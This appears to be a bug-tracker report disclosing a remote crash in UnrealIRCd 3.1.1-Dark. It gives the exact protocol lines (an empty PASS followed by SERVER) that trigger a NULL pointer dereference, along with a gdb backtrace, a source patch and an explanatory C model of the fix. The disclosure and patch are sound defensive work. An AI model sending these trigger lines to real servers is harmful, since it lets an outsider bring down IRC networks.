- priority: 5 --> 7
- summary: Server down when receive "PASS :(null)" --> Server down when receive "PASS :(null)"
Hi,
I found an exploit in UnrealIRCd while coding my own services server. I attach my code, which can bring down Unreal3.1.1-Dark.... (Tested on FreeBSD 4.0)
To use my code you have to add a C/N line.
[IRC Server 192.168.100.1 irc.lan]
% pico ircd.conf
..add C/N line for 192.168.100.100
% ./rehash
Unreal IRCD exploit!
Version Unreal3.1.1-Dark...
------------------------------------------------------------------------
Result:
(Core Dump)
Description:
If your machine has a C/N line on the TARGET machine, you can bring down TARGET without the link password. Just send an empty password to TARGET:
PROTOCTL TOKEN
PASS :
SERVER myserver.myhost.com 1 :NetName
Note: --TO TEST THIS--
1. Some (almost all) Telnet clients send \r\n. You have to write your own client to test it!
2. You must have a C/N line on the remote machine and provide the correct SERVER name!
------------------------------------------------------------------------
Correction:
s_serv.c: int m_server(cptr, sptr, parc, parv)
___________________________________________________
/* Original */
...
...
    encr = "";
#else
    encr = cptr->passwd;   /* NULL when no password was stored for this connection */
#endif /* CRYPT_LINK_PASSWORD */
    if (*aconf->passwd && !StrEq(aconf->passwd, encr))
    {
___________________________________________________
/* Fixed */
...
...
    encr = "";
#else
    /* Bug fixed by JUStice!krissada@citizen.in.th */
    if (cptr->passwd)
        encr = cptr->passwd;
    else
        encr = "";         /* a missing password is treated as empty, so the comparison never sees NULL */
#endif /* CRYPT_LINK_PASSWORD */
    if (*aconf->passwd && !StrEq(aconf->passwd, encr))
    {
...
...
___________________________________________________
Note:
encr takes its value from cptr->passwd, which is a NULL pointer here.
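As an added example (not the reporter's code and not UnrealIRCd's own), a small C model of the two stages involved: a PASS handler that leaves the stored password NULL when the parameter is empty, which is assumed to be how "PASS :" reaches m_server, and the link check written as in the Fixed hunk above, with StrEq modelled as a strcmp() wrapper (also an assumption).

```c
#include <stddef.h>
#include <string.h>

#define StrEq(a, b) (strcmp((a), (b)) == 0)   /* assumed model of UnrealIRCd's StrEq */

struct client    { const char *passwd; };    /* NULL until a PASS stores one */
struct link_conf { const char *passwd; };    /* link password from the C/N line */

/* Model of the PASS handler (assumption): an empty trailing parameter
   ("PASS :") is rejected as "need more params", so cptr->passwd stays
   NULL. The stored pointer refers into the caller's line buffer. */
void handle_pass(struct client *cptr, const char *line)
{
    const char *p = NULL;
    if (strncmp(line, "PASS ", 5) == 0) {
        p = line + 5;
        if (*p == ':')
            p++;                              /* skip the trailing-parameter prefix */
    }
    if (p == NULL || *p == '\0')
        return;                               /* nothing stored, passwd remains NULL */
    cptr->passwd = p;
}

/* Link check as in the report's Fixed hunk: a NULL password is treated
   as "" so a configured password simply fails to match instead of
   strcmp() dereferencing NULL. Returns 1 to accept, 0 to reject. */
int link_password_ok(const struct client *cptr, const struct link_conf *aconf)
{
    const char *encr = cptr->passwd ? cptr->passwd : "";
    if (*aconf->passwd && !StrEq(aconf->passwd, encr))
        return 0;
    return 1;
}

/* Driver: feed one PASS line, then evaluate the check done at SERVER time. */
int link_attempt(const char *pass_line, const char *configured)
{
    struct client cptr = { NULL };
    struct link_conf aconf = { configured };
    handle_pass(&cptr, pass_line);
    return link_password_ok(&cptr, &aconf);
}
```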
Core was generated by `ircd'.
Program terminated with signal 3, Quit.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
(gdb) bt
#0 0x280f9030 in kill () from /usr/lib/libc.so.4
#1 0x805f370 in s_segv () at ircd.c:302
#2 0xbfbfffac in ?? ()
#3 0x80622d1 in parse (cptr=0x814e800, buffer=0x814e8dc "SERVER", bufend=0x814e8ff "", mptr=0x80a4c44) at parse.c:480
#4 0x8061bc3 in dopacket (cptr=0x814e800, buffer=0x8115360 "SERVER services.thai.com 1 :ThaiNeT\r\n", length=37) at packet.c:121
#5 0x8065fc8 in read_packet (cptr=0x814e800, rfd=0xbfbffab4) at s_bsd.c:1655
#6 0x806683c in read_message (delay=2, listp=0x8123620) at s_bsd.c:2184
#7 0x80609ca in main (argc=1, argv=0xbfbffc08) at ircd.c:1372
(FreeBSD 4.0-RELEASE i386)
___________________________________________________
JUStice!krissada@citizen.in.th
Thai IRC Network (ThaiNeT)
irc://irc.thai.com